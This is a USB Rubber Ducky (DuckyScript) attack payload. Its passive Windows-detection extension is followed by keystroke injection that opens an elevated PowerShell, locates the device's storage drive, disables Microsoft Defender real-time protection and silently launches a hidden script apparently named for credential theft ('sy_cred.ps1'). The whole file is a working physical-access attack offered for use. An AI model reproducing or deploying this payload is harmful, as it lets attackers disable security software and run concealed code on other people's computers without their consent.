ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        Windows fully passive OS Detection and passive Detect Ready
        Includes its own passive detect ready.
        Does not require additional extensions.

        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay
            $_OS will be set to WINDOWS or NOT_WINDOWS
            See end of payload for usage within payload
    END_REM

    REM CONFIGURATION:
    DEFINE #MAX_WAIT 150
    DEFINE #CHECK_INTERVAL 20
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
    DEFINE #NOT_WINDOWS 7

    $_OS = #NOT_WINDOWS

    VAR $MAX_TRIES = #MAX_WAIT
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
        DELAY #CHECK_INTERVAL
        $MAX_TRIES = ($MAX_TRIES - 1)
    END_WHILE
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
        $_OS = WINDOWS
    END_IF

    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
        IF ($_OS == WINDOWS) THEN
            STRING HELLO WINDOWS!
        ELSE
            STRING HELLO WORLD!
        END_IF
    END_REM
END_EXTENSION

DEFINE #DUCKY_DRIVER_LABEL DUCKY
DEFINE #PS1 sy_cred.ps1

IF ($_OS == WINDOWS )THEN
    
    DELAY 200
    REM -----open Powershell as Admin
    GUI r
    DELAY 200
    STRING powershell 
    CTRL-SHIFT ENTER
    DELAY 400
    LEFT
    DELAY 150
    ENTER
    DELAY 500
    STRINGLN_POWERSHELL

    $duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter
    Set-MpPreference -DisableRealtimeMonitoring $true
    Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -File #PS1"  -WindowStyle Hidden
    exit

    END_STRINGLN

    

END_IF